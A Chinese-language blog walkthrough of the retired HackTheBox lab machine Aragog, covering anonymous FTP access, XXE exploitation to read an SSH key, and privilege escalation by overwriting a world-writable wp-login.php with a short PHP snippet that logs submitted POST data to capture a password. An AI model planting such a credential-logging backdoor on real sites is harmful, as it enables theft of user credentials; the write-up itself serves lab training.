HTB-靶机-Aragog

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.78

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.78 -o ./Aragog-autorecon

开放了3个端口,根据nmap的扫描结果,开放的ftp服务可以匿名登录并且上面有个文件test.txt将其下载下来得到如下信息

看此信息是个xml类型的文件内容,有可能跟xxe有关,再看看爆破的目录效果

发现了个有用的hosts.php文件,访问看看

没啥重要信息,想想把上面结果起来看看,使用burpsuite重放请求,具体关于xxe的攻击参考:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

根据上面显示,增加xxe攻击代码,构造语句,得出下面测试代码

知道了有两个用户,读取每个用户的密钥试试,但是只成功了一个,具体如下

将得到的密钥复制到本地给权限600然后ssh登录到目标靶机

准备开始提权了,查看了目标靶机的系统内核和所使用的操作系统

确认系统架构之后开始监控下系统进程运行的情况,这里使用pspy这个款工具,前面也介绍到了,链接:https://github.com/DominicBreuker/pspy

确认每分钟都有计划任务在执行目标靶机的登录功能,查看下网站根目录发现存在dev_wiki这个目录,访问的时候会自动跳转一个域名,通过本地绑定hosts来完成正常访问,没发现啥东西,还是直接修改上述计划任务执行的wp-login.php文件,因为目录dev_wiki是777权限,所有人都可以进行修改,修改成如下代码

<?php
file_put_contents("bmfx.log", print_r($_POST, true));
?>

最终得到密码

使用su直接切换至root用户

posted @ 2020-12-04 14:04  皇帽讲绿帽带法技巧  阅读(278)  评论(0编辑  收藏  举报